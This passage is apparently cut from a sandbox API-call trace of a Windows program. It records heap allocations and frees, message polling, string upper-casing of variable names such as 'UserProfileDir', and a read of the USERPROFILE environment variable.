hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0149.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0149.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0149.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0149.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0149.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0149.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0149.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0149.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0149.264] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0149.264] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0149.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0149.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0149.264] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0149.264] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0149.264] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0149.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0149.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a58 [0149.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0149.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0149.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0149.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0149.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0149.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0149.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0149.264] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0149.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0149.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0149.264] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0149.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0149.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0149.264] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9298 [0149.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0149.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0149.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9250 [0149.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0149.265] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0149.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0149.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0149.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0149.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0149.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0149.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0149.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0149.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0149.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0149.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0149.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0149.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0149.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0149.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0149.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7160 [0149.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0149.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0149.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0149.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0149.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0149.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0149.265] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0149.265] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0149.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7160 | out: hHeap=0x2af0000) returned 1 [0149.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0149.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0149.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b28 [0149.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0149.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0149.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0149.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0149.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0149.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0149.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0149.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0149.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0149.266] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0149.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0149.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0149.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa92c8 [0149.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0149.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0149.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9298 [0149.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0149.266] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0149.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0149.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0149.266] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0149.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0149.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0149.266] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0149.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0149.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0149.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0149.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0149.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0149.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0149.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0149.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0149.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fc0 [0149.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0149.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xa0) returned 0x2a68440 [0149.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0149.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0149.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0149.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0149.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fc0 | out: hHeap=0x2af0000) returned 1 [0149.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0149.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0149.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b38 [0149.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0149.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0149.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0149.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0149.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71aa8 [0149.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0149.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0149.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0149.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9298 [0149.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0149.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0149.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0149.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0149.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0149.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0149.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0149.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0149.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0149.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0149.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0149.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0149.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0149.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0149.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0149.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0149.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0149.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0149.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0149.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0149.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0149.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0149.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0149.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0149.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0149.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0149.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0149.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0149.268] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0149.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0149.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0149.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0149.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0149.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0149.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0149.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0149.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0149.269] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0149.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0149.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0149.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0149.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0149.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0149.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0149.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0149.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0149.269] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0149.269] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0149.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0149.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0149.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0149.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0149.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0149.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0149.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0149.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0149.269] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0149.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0149.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0149.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0149.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0149.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0149.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0149.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0149.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0149.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0149.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0149.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0149.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0149.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0149.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0149.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0149.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0149.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0149.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0149.270] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0149.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0149.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0149.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0149.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0149.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0149.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0149.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0149.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0149.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0149.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0149.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0149.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0149.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0149.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0149.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0149.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0149.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0149.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0149.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa078 [0149.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0149.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0149.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0149.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0149.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0149.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0149.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0149.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0149.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0149.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0149.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0149.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0149.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0149.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0149.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0149.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0149.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0149.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0149.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0149.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0149.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0149.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0149.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0149.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0149.272] HeapFree 